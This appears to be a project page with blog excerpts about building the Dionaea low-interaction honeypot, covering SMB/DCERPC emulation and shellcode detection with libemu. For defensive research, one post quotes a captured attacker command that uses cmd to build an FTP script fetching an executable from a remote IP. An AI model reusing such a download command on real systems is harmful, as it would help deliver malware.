Nepenthes is one of the leading low-interaction honeypots designed to automate the capture and analysis of malware, and this project will be a next generation development of low interaction server honeypots able to automatically and scalably detect known and unknown malware.
Mentor: Paul Baecher
Student: Markus Koetter
A simple protocol which can be connected using netcat or openssl s_client via ipv4/6 proves these claims16.07.2009
A simple protocol written in python which can be connected using netcat or openssl s_client via ipv4/6 is provided to proof the claims10.08.2009
An exploit taken from a public repository, run against the software, is detected and emulated.24.08.2009
The Dionaea honeypot got more and more mature during the last weeks. As Markus blogged in Iteolih: Miles and More the software is now able to detect shellcode via libemu and generates a nice shellcode profile out of this.
The SMB / DCERPC implementation also got fairly mature and is now able to cope with all packet types and also most caveats and differences of implementations in exploits. As I registered more and more RPC vulnerabilities in the module, it was definitely time to give libemu something to eat! :)
We got a new milestone due:
An exploit taken from a public repository, run against the software, is detected and emulated.
To shorten things, basically all required points are hit with current svn.
So, given the time we just saved, some words about how it works.
Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:
WinExec("cmd /c echo open 184.108.40.206 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.
While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).
SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.
due to the length of the whole term Improving the effectiveness of low interaction honeypots, I decided to use Iteolih as uniq abbrevitation. Things are rolling for the project, writing code started, a basic homepage with instructions how to compile/use it was created.
I even had the plan to write about it once or twice, finish something in the code, write about it. When I was done with the code, I got the idea, writing about it was not worth your time.
As the plan is to embedd python as scripting language into the honeypot, I ran a benchmark on a testsuite. The 'testsuite' is a c core which accepts connections, and allows python to deal with the input. The protocol used for benchmarking is http, the service serves a non static html page.
To benchmark, I ran the apache benchmark tool ab